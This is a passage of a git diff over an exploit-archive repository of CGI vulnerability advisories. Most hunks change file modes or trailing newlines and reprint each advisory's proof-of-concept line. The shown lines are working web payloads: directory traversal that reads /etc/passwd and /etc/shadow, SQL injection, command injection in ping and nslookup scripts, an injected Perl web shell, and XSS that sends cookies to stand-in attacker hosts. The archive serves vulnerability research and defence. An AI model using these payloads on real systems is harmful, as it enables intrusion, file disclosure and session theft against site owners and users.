specially crafted URL composed of '%00' sequences along with the known filename will disclose the requested file. -http://target/ROADS/cgi-bin/search.pl?form=url_to_any_file%00 \ No newline at end of file +http://target/ROADS/cgi-bin/search.pl?form=url_to_any_file%00 \ No newline at end of file diff --git a/platforms/cgi/remote/20631.txt b/platforms/cgi/remote/20631.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20632.txt b/platforms/cgi/remote/20632.txt old mode 100755 new mode 100644 index 777c6f996..5b2065e1a --- a/platforms/cgi/remote/20632.txt +++ b/platforms/cgi/remote/20632.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2372/info A specially crafted URL composed of a known filename, will disclose the requested file residing on a machine running WebPALS. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. -http://target/pals-cgi?palsAction=restart&documentName=url_to_command \ No newline at end of file +http://target/pals-cgi?palsAction=restart&documentName=url_to_command \ No newline at end of file diff --git a/platforms/cgi/remote/20633.txt b/platforms/cgi/remote/20633.txt old mode 100755 new mode 100644 index c795507e8..e6a30b3d2 --- a/platforms/cgi/remote/20633.txt +++ b/platforms/cgi/remote/20633.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/2374/info Making an invalid request to a machine running Brightstation Muscat, will disclose the physical path to the root directory. http://target/cgi-bin/empower?DB=UkRteamHole -http://target/cgi-bin/empower?DB=UkRteamHole \ No newline at end of file +http://target/cgi-bin/empower?DB=UkRteamHole \ No newline at end of file diff --git a/platforms/cgi/remote/20683.txt b/platforms/cgi/remote/20683.txt old mode 100755 new mode 100644 index 49a8b0f8e..5606a333b --- a/platforms/cgi/remote/20683.txt +++ b/platforms/cgi/remote/20683.txt @@ -18,4 +18,4 @@ will disclose /etc/passwd, if readable by the webserver. http://www.example.com/cgi-bin/ikonboard/help.cgi?helpon=../members/[member].cgi%00 -discloses the ikonboard account password for [member], including admin acounts. \ No newline at end of file +discloses the ikonboard account password for [member], including admin acounts. \ No newline at end of file diff --git a/platforms/cgi/remote/20686.txt b/platforms/cgi/remote/20686.txt old mode 100755 new mode 100644 index c3d1ecff5..ce857193a --- a/platforms/cgi/remote/20686.txt +++ b/platforms/cgi/remote/20686.txt @@ -4,4 +4,4 @@ A vulnerability exists in a CGI script called "The Free Online Dictionary of Com Due to a failure to properly validate user supplied input, a remote attacker can compose and submit requests for files readable by the webserver, as well as executing certain commands (those requiring no command line parameters) with the privilege level of the webserver process. -http://example.com/foldoc/template.cgi?template.cgi \ No newline at end of file +http://example.com/foldoc/template.cgi?template.cgi \ No newline at end of file diff --git a/platforms/cgi/remote/20714.txt b/platforms/cgi/remote/20714.txt old mode 100755 new mode 100644 index d0a9bfdf3..bd01c8322 --- a/platforms/cgi/remote/20714.txt +++ b/platforms/cgi/remote/20714.txt @@ -4,4 +4,4 @@ Clipper is a headline-gathering tool from Anaconda! Partners which, in certain v By including '/../' sequences in requested URLs, an attacker can cause the retrieval of arbitrary files, compromising the privacy of user data and potentially obtaining information which could be used to further compromise the host's security. -http://www.target.com/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.target.com/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/cgi/remote/20725.txt b/platforms/cgi/remote/20725.txt old mode 100755 new mode 100644 index 684eb5cb9..9f6b052c1 --- a/platforms/cgi/remote/20725.txt +++ b/platforms/cgi/remote/20725.txt @@ -13,4 +13,4 @@ http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../ http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd http://www.example .com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../. -./../../../../bin/cat%20ustorekeeper.pl| \ No newline at end of file +./../../../../bin/cat%20ustorekeeper.pl| \ No newline at end of file diff --git a/platforms/cgi/remote/20752.txt b/platforms/cgi/remote/20752.txt old mode 100755 new mode 100644 index ae3f34445..cfffaeeb3 --- a/platforms/cgi/remote/20752.txt +++ b/platforms/cgi/remote/20752.txt @@ -8,4 +8,4 @@ Therefore, it is possible for a remote user to execute arbitrary SQL queries usi http://www.TARGET/content.pl?group=49&id=140a -http://www.TARGET/content.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000%20or%20kategorie<10000%20or%20kategorie>10%20or%20ls_id>1%20or%20id<10%20or%20kategorie<10%20or%20kategorie>4&shortdetail=1 \ No newline at end of file +http://www.TARGET/content.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000%20or%20kategorie<10000%20or%20kategorie>10%20or%20ls_id>1%20or%20id<10%20or%20kategorie<10%20or%20kategorie>4&shortdetail=1 \ No newline at end of file diff --git a/platforms/cgi/remote/20780.c b/platforms/cgi/remote/20780.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20799.c b/platforms/cgi/remote/20799.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20800.c b/platforms/cgi/remote/20800.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20801.c b/platforms/cgi/remote/20801.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20808.txt b/platforms/cgi/remote/20808.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20809.html b/platforms/cgi/remote/20809.html old mode 100755 new mode 100644 index 9c283b21e..106106dc5 --- a/platforms/cgi/remote/20809.html +++ b/platforms/cgi/remote/20809.html @@ -16,4 +16,4 @@ Reload this page, in case the log file or status has changed. </body> </html> -"Of course you should replace EWS.SERVER.COM and ENCRYPTEDPASS with values that make sense for your situation. By accessing this page and clicking on the button you get to a menu that behaves exactly as if you knew the unencrypted password." \ No newline at end of file +"Of course you should replace EWS.SERVER.COM and ENCRYPTEDPASS with values that make sense for your situation. By accessing this page and clicking on the button you get to a menu that behaves exactly as if you knew the unencrypted password." \ No newline at end of file diff --git a/platforms/cgi/remote/20831.txt b/platforms/cgi/remote/20831.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20832.txt b/platforms/cgi/remote/20832.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20833.txt b/platforms/cgi/remote/20833.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20878.txt b/platforms/cgi/remote/20878.txt old mode 100755 new mode 100644 index 950528f5e..e9b013197 --- a/platforms/cgi/remote/20878.txt +++ b/platforms/cgi/remote/20878.txt @@ -7,4 +7,4 @@ Source Viewer accepts an argument, 'loc', which it uses as the filename when ope The following URL demonstrates the problem: http://localhost/cgi-bin/viewsrc.cgi? -loc=../[any file outside restricted directory] \ No newline at end of file +loc=../[any file outside restricted directory] \ No newline at end of file diff --git a/platforms/cgi/remote/20887.txt b/platforms/cgi/remote/20887.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20895.txt b/platforms/cgi/remote/20895.txt old mode 100755 new mode 100644 index 9580e27e2..065df65a3 --- a/platforms/cgi/remote/20895.txt +++ b/platforms/cgi/remote/20895.txt @@ -4,4 +4,4 @@ WebTrends Live is a web-based reporting service which provides interactive track It is possible to view the source code of arbitrary scripts on the WebTrends Live webserver. This is accomplished by crafting a URL with an encoded space after the filename of the script. -http://host/remote_login.pl%20 \ No newline at end of file +http://host/remote_login.pl%20 \ No newline at end of file diff --git a/platforms/cgi/remote/20938.txt b/platforms/cgi/remote/20938.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20939.txt b/platforms/cgi/remote/20939.txt old mode 100755 new mode 100644 index b74df818f..6868a4256 --- a/platforms/cgi/remote/20939.txt +++ b/platforms/cgi/remote/20939.txt @@ -4,4 +4,4 @@ DCShop is a GCI-based ecommerce system from DCScripts. Under certain configurations, a beta version of this product can allow a remote user to request and obtain files containing confidential order data, including credit card and other private customer information, as well as the DCShop admnistrator login ID and password. -http://theTargetHost/cgi-bin/DCShop/Auth_data/auth_user_file.txt \ No newline at end of file +http://theTargetHost/cgi-bin/DCShop/Auth_data/auth_user_file.txt \ No newline at end of file diff --git a/platforms/cgi/remote/20940.txt b/platforms/cgi/remote/20940.txt old mode 100755 new mode 100644 index 42388f259..b456c409e --- a/platforms/cgi/remote/20940.txt +++ b/platforms/cgi/remote/20940.txt @@ -7,4 +7,4 @@ ttawebtop.cgi is a CGI script included with the Tarantella, formerly SCO. ttaweb ttawebtop.cgi does not sufficiently validate input. In not doing so, it's possible for a remote user to traverse the directory structure, and view any file that is readable by the webserver process. -http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/cgi/remote/21008.txt b/platforms/cgi/remote/21008.txt old mode 100755 new mode 100644 index 339419bed..a5b9a4352 --- a/platforms/cgi/remote/21008.txt +++ b/platforms/cgi/remote/21008.txt @@ -7,4 +7,4 @@ Interactive Story does not filter '../' sequences from user input submitted to a The disclosed information may be used in further attacks on the host. If an attacker sets the "next" field to something like -../../../../../../../../../../etc/passwd%00, Interactive Story will open and display the password file. \ No newline at end of file +../../../../../../../../../../etc/passwd%00, Interactive Story will open and display the password file. \ No newline at end of file diff --git a/platforms/cgi/remote/21023.c b/platforms/cgi/remote/21023.txt old mode 100755 new mode 100644 similarity index 97% rename from platforms/cgi/remote/21023.c rename to platforms/cgi/remote/21023.txt index e1eeb6b55..a7d50fe02 --- a/platforms/cgi/remote/21023.c +++ b/platforms/cgi/remote/21023.txt @@ -16,5 +16,4 @@ http://www.example.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.doma Stealing your Cookies issued by www.example.org, if any: -http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SC -RIPT> \ No newline at end of file +http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT> \ No newline at end of file diff --git a/platforms/cgi/remote/21068.txt b/platforms/cgi/remote/21068.txt old mode 100755 new mode 100644 index eb6c7c6ef..6fe2b536d --- a/platforms/cgi/remote/21068.txt +++ b/platforms/cgi/remote/21068.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/3175/info SIX-webboard 2.01 does not filter ".." and "/" from user input, allowing users to enter arbitrary values in order to view or retrieve files not normally accessible to them from the remote host. -http://www.target.com/cgi-bin/webboard/generate.cgi/?content=../../../../../../../../../directory/file%00&board=boardsname \ No newline at end of file +http://www.target.com/cgi-bin/webboard/generate.cgi/?content=../../../../../../../../../directory/file%00&board=boardsname \ No newline at end of file diff --git a/platforms/cgi/remote/211.c b/platforms/cgi/remote/211.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/21102.txt b/platforms/cgi/remote/21102.txt old mode 100755 new mode 100644 index a061a2782..9c663ff71 --- a/platforms/cgi/remote/21102.txt +++ b/platforms/cgi/remote/21102.txt @@ -4,4 +4,4 @@ Power Up HTML is a set of HTML-like commands that can be placed into web pages. A vulnerability exists in Power Up HTML which allows directory traversal through the web server using ../ strings in a CGI request. This directory traversal can be used to view or execute arbitrary files on the webserver to which the web service has permissions. Failure to filter metacharacters from HTTP requests can allow user-supplied values to run. -http://www.target.com/cgi-bin/powerup/r.cgi?FILE=../../../../../etc/passwd \ No newline at end of file +http://www.target.com/cgi-bin/powerup/r.cgi?FILE=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/cgi/remote/21129.java b/platforms/cgi/remote/21129.java old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/21183.txt b/platforms/cgi/remote/21183.txt old mode 100755 new mode 100644 index 801fa1adf..c808fd1ab --- a/platforms/cgi/remote/21183.txt +++ b/platforms/cgi/remote/21183.txt @@ -6,4 +6,4 @@ Webmin does not adequately filter '../' sequences from web requests, making it p It may also be possible to edit files or place files on the server. This may lead to a remote root compromise. -http://www.domain.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+../../../../../etc/shadow \ No newline at end of file +http://www.domain.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+../../../../../etc/shadow \ No newline at end of file diff --git a/platforms/cgi/remote/21194.txt b/platforms/cgi/remote/21194.txt old mode 100755 new mode 100644 index 4e26eb633..e0157f663 --- a/platforms/cgi/remote/21194.txt +++ b/platforms/cgi/remote/21194.txt @@ -6,4 +6,4 @@ zml.cgi accepts as a parameter the file to parse for these ssi directives. This The author of the script has reported that this vulnerability does not exist in any published version of ZML, and that the file parameter has never been used by ZML. It is possible that this vulnerability exists in a modified version of ZML published by an unknown third party. If more details become available, this vulnerability will be updated. -http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00 \ No newline at end of file +http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00 \ No newline at end of file diff --git a/platforms/cgi/remote/21249.txt b/platforms/cgi/remote/21249.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/21263.txt b/platforms/cgi/remote/21263.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/21354.txt b/platforms/cgi/remote/21354.txt old mode 100755 new mode 100644 index fe29d6b1c..f20054d26 --- a/platforms/cgi/remote/21354.txt +++ b/platforms/cgi/remote/21354.txt @@ -35,4 +35,4 @@ URL Encoded as: csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Comm and+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26 -%26print`$in{'cmd'}+2>%261`;exit;}; \ No newline at end of file +%26print`$in{'cmd'}+2>%261`;exit;}; \ No newline at end of file diff --git a/platforms/cgi/remote/21390.txt b/platforms/cgi/remote/21390.txt old mode 100755 new mode 100644 index ae324cbb5..7dc9eb538 --- a/platforms/cgi/remote/21390.txt +++ b/platforms/cgi/remote/21390.txt @@ -4,4 +4,4 @@ An issue has been discovered in Sambar Server, which could allow a user to revea Submitting a request for a known script file along with a space and null character (%00), will successfully bypass the serverside URL parsing. -http://server/cgi-bin/environ.pl+%00 \ No newline at end of file +http://server/cgi-bin/environ.pl+%00 \ No newline at end of file diff --git a/platforms/cgi/remote/21415.txt b/platforms/cgi/remote/21415.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/21641.txt b/platforms/cgi/remote/21641.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/21642.txt b/platforms/cgi/remote/21642.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/22000.txt b/platforms/cgi/remote/22000.txt old mode 100755 new mode 100644 index 258d31021..354fd7a4c --- a/platforms/cgi/remote/22000.txt +++ b/platforms/cgi/remote/22000.txt @@ -6,4 +6,4 @@ Due to insufficient sanitization of user-supplied input it is possible for an at The vendor has stated that cookies are not used to store usernames and passwords. -http://hostname:9090/apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script> \ No newline at end of file +http://hostname:9090/apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/cgi/remote/22054.c b/platforms/cgi/remote/22054.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/22311.txt b/platforms/cgi/remote/22311.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/22312.txt b/platforms/cgi/remote/22312.txt old mode 100755 new mode 100644 index 883a73a37..9e51bd757 --- a/platforms/cgi/remote/22312.txt +++ b/platforms/cgi/remote/22312.txt @@ -4,4 +4,4 @@ A file retrieval vulnerability has been reported for QuickTime/Darwin Streaming This vulnerability was tested on SS for Microsoft Windows systems. -http://localhost:1220/parse_xml.cgi?filename=.../qtusers \ No newline at end of file +http://localhost:1220/parse_xml.cgi?filename=.../qtusers \ No newline at end of file diff --git a/platforms/cgi/remote/22355.txt b/platforms/cgi/remote/22355.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/22541.txt b/platforms/cgi/remote/22541.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/22542.txt b/platforms/cgi/remote/22542.txt old mode 100755 new mode 100644 index 3d1127a47..b790ff5ff --- a/platforms/cgi/remote/22542.txt +++ b/platforms/cgi/remote/22542.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7439/info Reportedly, remote users can discover the installation directory of certain software on the underlying system by submitting an HTTP request to the WebAdmin server. This could allow an attacker to obtain sensitive information. -http://www.example.com/WebAdmin.dll?session=X&Program=MDaemon&Directory:Name=C:\MDaemon\App&File:Name=MDAEMON.INI&View=EditFile \ No newline at end of file +http://www.example.com/WebAdmin.dll?session=X&Program=MDaemon&Directory:Name=C:\MDaemon\App&File:Name=MDAEMON.INI&View=EditFile \ No newline at end of file diff --git a/platforms/cgi/remote/23187.txt b/platforms/cgi/remote/23187.txt old mode 100755 new mode 100644 index c7e4ce499..d94073476 --- a/platforms/cgi/remote/23187.txt +++ b/platforms/cgi/remote/23187.txt @@ -18,4 +18,4 @@ site's Webmaster (root@example.com). Stat failed. /home/jcf/cgi-bin/a.pl: No such file or directory sbox version 1.04 -$Id: sbox.c,v 1.9 2000/03/28 20:12:40 lstein Exp $ \ No newline at end of file +$Id: sbox.c,v 1.9 2000/03/28 20:12:40 lstein Exp $ \ No newline at end of file diff --git a/platforms/cgi/remote/23304.txt b/platforms/cgi/remote/23304.txt old mode 100755 new mode 100644 index 4cbb6b9a2..473c3a0d0 --- a/platforms/cgi/remote/23304.txt +++ b/platforms/cgi/remote/23304.txt @@ -6,4 +6,4 @@ Successful exploitation of this attack may allow an attacker to steal cookie-bas Norton Internet Security 2003 v6.0.4.34 has been reported to be prone to this issue, however other versions may be affected as well. -http://www.example.com/page.cgi?<SCRIPT>alert(document.domain)</SCRIPT> \ No newline at end of file +http://www.example.com/page.cgi?<SCRIPT>alert(document.domain)</SCRIPT> \ No newline at end of file diff --git a/platforms/cgi/remote/23312.txt b/platforms/cgi/remote/23312.txt old mode 100755 new mode 100644 index 5c78b2f1b..60a2ee8da --- a/platforms/cgi/remote/23312.txt +++ b/platforms/cgi/remote/23312.txt @@ -8,4 +8,4 @@ A denial of service condition could be caused in the software by providing a dev A cross-site scripting vulnerability has also been reported to exist in the software due to insufficient santization of user-supplied input to INIFILE. This problem presents itself when an invalid file name is supplied as an argument for INIFILE. This vulnerability could be exploited to steal cookie-based credentials. Other attacks are possible as well. -http://www.example.com/udataobj/webgui/cgi-bin/tuxadm.exe?INIFILE=<script>alert('XSS')</script> \ No newline at end of file +http://www.example.com/udataobj/webgui/cgi-bin/tuxadm.exe?INIFILE=<script>alert('XSS')</script> \ No newline at end of file diff --git a/platforms/cgi/remote/23582.txt b/platforms/cgi/remote/23582.txt old mode 100755 new mode 100644 index 2e4867259..27af670b8 --- a/platforms/cgi/remote/23582.txt +++ b/platforms/cgi/remote/23582.txt @@ -4,4 +4,4 @@ thttpd is prone to a cross-site scripting vulnerability in the CGI test script. It should be noted that FREESCO includes an embedded version of thttpd and is also prone to this vulnerability. -http://www.example.com/cgi/example?test=<script>alert('xss')</script> \ No newline at end of file +http://www.example.com/cgi/example?test=<script>alert('xss')</script> \ No newline at end of file diff --git a/platforms/cgi/remote/23804.txt b/platforms/cgi/remote/23804.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/23987.txt b/platforms/cgi/remote/23987.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/24326.txt b/platforms/cgi/remote/24326.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/24327.txt b/platforms/cgi/remote/24327.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/24336.txt b/platforms/cgi/remote/24336.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/24337.txt b/platforms/cgi/remote/24337.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/24342.txt b/platforms/cgi/remote/24342.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/25648.txt b/platforms/cgi/remote/25648.txt old mode 100755 new mode 100644 index acb26adc4..75afef956 --- a/platforms/cgi/remote/25648.txt +++ b/platforms/cgi/remote/25648.txt @@ -11,4 +11,4 @@ ping ;sh traceroute ;sh https://www.example.com/nslookup.cgi?ip=localhost%26%26cat%20/stand/htdocs/config/admin -https://www.example.com/ping.cgi?ip=localhost%26%26touch+/tmp/test \ No newline at end of file +https://www.example.com/ping.cgi?ip=localhost%26%26touch+/tmp/test \ No newline at end of file diff --git a/platforms/cgi/remote/26768.txt b/platforms/cgi/remote/26768.txt old mode 100755 new mode 100644 index 2dc04d57e..d92bc1ef0 --- a/platforms/cgi/remote/26768.txt +++ b/platforms/cgi/remote/26768.txt @@ -8,4 +8,4 @@ http://www.example.com/cgi-bin/perlcal/cal_make.pl ?p0=%3Cscript%3Ewindow.open('http://www.example.com');%3Cscript%3E<http://www.example.com%27%29;%3Cscript%3E> http://www.example.com/cgi-bin/perlcal/cal_make.pl -?p0=%3Cscript%3Ealert(document.cookie);</script> \ No newline at end of file +?p0=%3Cscript%3Ealert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/cgi/remote/32962.txt b/platforms/cgi/remote/32962.txt old mode 100755 new mode 100644 index 422864ee1..034a36ee1 --- a/platforms/cgi/remote/32962.txt +++ b/platforms/cgi/remote/32962.txt @@ -33,4 +33,4 @@ HTTP request to access other internal IP addresses configured on the private LAN GET http://10.0.0.1/ HTTP/1.1 Host: 192.168.0.1:2128 -[...] \ No newline at end of file +[...] \ No newline at end of file diff --git a/platforms/cgi/remote/33051.txt b/platforms/cgi/remote/33051.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/36045.txt b/platforms/cgi/remote/36045.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/37428.txt b/platforms/cgi/remote/37428.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/39074.txt b/platforms/cgi/remote/39074.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/1004.php b/platforms/cgi/webapps/1004.php old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/1040.c b/platforms/cgi/webapps/1040.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/11823.txt b/platforms/cgi/webapps/11823.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/1194.c b/platforms/cgi/webapps/1194.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/1236.pm b/platforms/cgi/webapps/1236.pm old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/15625.txt b/platforms/cgi/webapps/15625.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/15737.txt b/platforms/cgi/webapps/15737.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/15744.txt b/platforms/cgi/webapps/15744.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/15807.txt b/platforms/cgi/webapps/15807.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/16006.html b/platforms/cgi/webapps/16006.html old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/1677.php b/platforms/cgi/webapps/1677.php old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/1680.pm b/platforms/cgi/webapps/1680.pm old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/17259.txt b/platforms/cgi/webapps/17259.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/17443.txt b/platforms/cgi/webapps/17443.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/17577.txt b/platforms/cgi/webapps/17577.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/17653.txt b/platforms/cgi/webapps/17653.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/179.c b/platforms/cgi/webapps/179.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/18153.txt b/platforms/cgi/webapps/18153.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/18582.txt b/platforms/cgi/webapps/18582.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/18722.txt b/platforms/cgi/webapps/18722.txt old mode 100755 new mode 100644 index b565113eb..abc9fed7e --- a/platforms/cgi/webapps/18722.txt +++ b/platforms/cgi/webapps/18722.txt @@ -11,4 +11,4 @@ </html> ################################################################################################## password ======> 123456 Now you can get the username & the password------------------------------------------------------Contact :Oeb1590@hotmail.comFacebook : Https:\www.facebook.com\Want.Revenge - \|||/ .-.________ (o o) ________.-. -----/ \_)_______) +----------oooO------------+ (_______(_/ \------ ( ()___) The Blacke Devils (___() ) ()__) (__() ----\___()_) Algeria Warriors (_()___/----- +-------------Ooo----------+ In:Arab47.com \ No newline at end of file + \|||/ .-.________ (o o) ________.-. -----/ \_)_______) +----------oooO------------+ (_______(_/ \------ ( ()___) The Blacke Devils (___() ) ()__) (__() ----\___()_) Algeria Warriors (_()___/----- +-------------Ooo----------+ In:Arab47.com \ No newline at end of file diff --git a/platforms/cgi/webapps/18824.txt b/platforms/cgi/webapps/18824.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/18841.txt b/platforms/cgi/webapps/18841.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21184.txt b/platforms/cgi/webapps/21184.txt old mode 100755 new mode 100644 index 44ab7e564..08632b172 --- a/platforms/cgi/webapps/21184.txt +++ b/platforms/cgi/webapps/21184.txt @@ -8,4 +8,4 @@ As a result, it is possible for an attacker to construct a link to the script th This issue may be exploited to by an attacker to steal cookie-based authentication credentials, permitting the attacker to hijack an Agora.cgi session and perform actions as a legitimate user. A number of other cross-site scripting attacks are also possible. -http://agorasite/store/agora.cgi?cart_id=<script>alert(document.cookie)</script>&xm=on&product=HTML \ No newline at end of file +http://agorasite/store/agora.cgi?cart_id=<script>alert(document.cookie)</script>&xm=on&product=HTML \ No newline at end of file diff --git a/platforms/cgi/webapps/21187.txt b/platforms/cgi/webapps/21187.txt old mode 100755 new mode 100644 index ae98ce1f8..7aa97b1d6 --- a/platforms/cgi/webapps/21187.txt +++ b/platforms/cgi/webapps/21187.txt @@ -8,4 +8,4 @@ The impact of this issue is that the attacker is able to hijack a legitimate web Aktivate 1.03 is known to be vulnerable, other versions may also be affected. -https://host/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert(document.domain)</script> \ No newline at end of file +https://host/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert(document.domain)</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/21208.txt b/platforms/cgi/webapps/21208.txt old mode 100755 new mode 100644 index 14d6f54b0..efcec0a6b --- a/platforms/cgi/webapps/21208.txt +++ b/platforms/cgi/webapps/21208.txt @@ -10,4 +10,4 @@ This makes it possible for a malicious user to post a message which is capable o ('&#x3cimg src=&#x68;tt&#x70;://attackerssite/tools/cookie.plx?cookie='+escape(docu ment.cookie)+'&#x3e') -[/img] \ No newline at end of file +[/img] \ No newline at end of file diff --git a/platforms/cgi/webapps/21209.txt b/platforms/cgi/webapps/21209.txt old mode 100755 new mode 100644 index 087cd1d34..6a7bdc4c0 --- a/platforms/cgi/webapps/21209.txt +++ b/platforms/cgi/webapps/21209.txt @@ -11,4 +11,4 @@ The following example will send cookie-based authentication credentials to the a [IMG]javascr&#x69;pt:document.wr&#x69;te &#x28;'<img%20src=&#x68;tt&#x70;://attackersite/tools/cookie.plx? cookie='+escape&#x28;document.cook&#x69;e&#x29;+'>'&#x29; -[/IMG] \ No newline at end of file +[/IMG] \ No newline at end of file diff --git a/platforms/cgi/webapps/21257.txt b/platforms/cgi/webapps/21257.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21352.txt b/platforms/cgi/webapps/21352.txt old mode 100755 new mode 100644 index 15108850d..c143facf0 --- a/platforms/cgi/webapps/21352.txt +++ b/platforms/cgi/webapps/21352.txt @@ -6,4 +6,4 @@ It is possible to overwrite setup files (*.setup) by submitting attacker-supplie curl -F database=@test.txt http://host/cgi-bin/dcshop.cgi -where test.txt contains databasename.setup[nullbyte]. \ No newline at end of file +where test.txt contains databasename.setup[nullbyte]. \ No newline at end of file diff --git a/platforms/cgi/webapps/21374.txt b/platforms/cgi/webapps/21374.txt old mode 100755 new mode 100644 index 69d1497e5..18e8dc613 --- a/platforms/cgi/webapps/21374.txt +++ b/platforms/cgi/webapps/21374.txt @@ -6,4 +6,4 @@ A vulnerability has been reported in some versions of Web Datablade. Reportedly, There have been reports that a similar issue exists within the HTTP Basic Authentication process used by Web Datablade, which also submits queries to the database. However, detailed exploitation information is not available for this case. -http://victim.com/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html \ No newline at end of file +http://victim.com/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html \ No newline at end of file diff --git a/platforms/cgi/webapps/21405.txt b/platforms/cgi/webapps/21405.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21406.txt b/platforms/cgi/webapps/21406.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21411.txt b/platforms/cgi/webapps/21411.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/21433.txt b/platforms/cgi/webapps/21433.txt old mode 100755 new mode 100644 index e0d633f8f..3cc31296e --- a/platforms/cgi/webapps/21433.txt +++ b/platforms/cgi/webapps/21433.txt @@ -13,4 +13,4 @@ or When posting comments just insert the <script>alert('evil+java+script+here')</script> -to the comments field. \ No newline at end of file +to the comments field. \ No newline at 